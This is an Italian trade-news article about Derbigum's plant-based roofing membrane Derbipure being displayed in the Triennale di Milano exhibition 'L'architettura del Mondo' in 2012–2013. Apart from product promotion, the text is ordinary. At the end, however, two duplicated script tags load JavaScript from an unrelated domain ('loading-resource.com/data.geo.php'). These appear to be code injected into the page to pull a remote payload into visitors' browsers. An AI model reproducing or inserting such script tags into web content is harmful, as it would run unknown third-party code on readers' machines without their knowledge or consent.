1. Home
  2. Notizie e Mercato
  3. Derbigum in mostra alla Triennale di Milano con la membrana vegetale Derbipure

Derbigum in mostra alla Triennale di Milano con la membrana vegetale Derbipure

Sistema tetto di
5/5
votato da 1 persone
L’innovativa membrana Derbigum partecipa alla mostra “L’architettura del Mondo. Infrastrutture, mobilità, nuovi paesaggi”, aperta a Milano fino a febbraio


Derbigum prende parte alla mostra “L’architettura del Mondo. Infrastrutture, mobilità, nuovi paesaggi” con la rivoluzionaria membrana vegetale Derbipure. L’iniziativa è dedicata alle infrastrutture e inaugurata lo scorso 8 ottobre presso la Triennale di Milano. Il titolo è un riferimento esplicito a quelle opere – strade, ferrovie, aeroporti – che contribuiscono a dar forma al mondo e ne permettono il funzionamento e il loro rapporto con le abitudini che cambiano e con un ambiente sempre più in pericolo.
La mostra si compone di quattro sezioni di cui una, quella storica, rappresenta un elemento di continuità del percorso e le altre tre, in successione, espongono opere e progetti relativi a ciò che si produce al di fuori del nostro paese, a ciò che stato realizzato o è in corso d’opera in Italia e, infine, a ciò che inizia a presentarsi come un quadro geografico a scala globale al quale le nuove grandi infrastrutture si rapportano.

Il percorso espositivo sarà completato da una galleria dedicata ai materiali innovativi, dove saranno presentati i campioni dei materiali per l’edilizia e l’architettura più all’avanguardia, accompagnati da didascalie descrittive e da esempi di applicazioni. La membrana Derbipure è stata inserita in questa presentazione, come prodotto altamente tecnologico e innovativo.

Derbipure è la prima membrana interamente vegetale mai realizzata, unica al mondo e perfetta per gli interventi di bioedilizia. Grazie alla formulazione ecologica – a base di oli e resine vegetali provenienti dall’industria cartaria e alimentare – il manto di copertura offre una soluzione all’avanguardia al problema delle materie prime derivanti dal bitume e dal petrolio.

Caratterizzata da elevate capacità di durata e tenuta, Derbipure limita in maniera sostanziale i costi per il condizionamento, grazie alla superficie bianca “cool roof” che permette di abbassare la temperatura dell’edificio rispetto ad un normale tetto nero, ottimizzando così anche la resa dei pannelli fotovoltaici in quanto ne mantiene i parametri ai livelli ideali.

La mostra resterà aperta dal 9 ottobre 2012 al 10 febbraio 2013.

Ulteriori informazioni sono disponibili sul sito:
http://www.triennale.it/it/mostre/future/1284-larchitettura-del-mondo-infrastrutturemobilita-nuovi-paesaggi

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>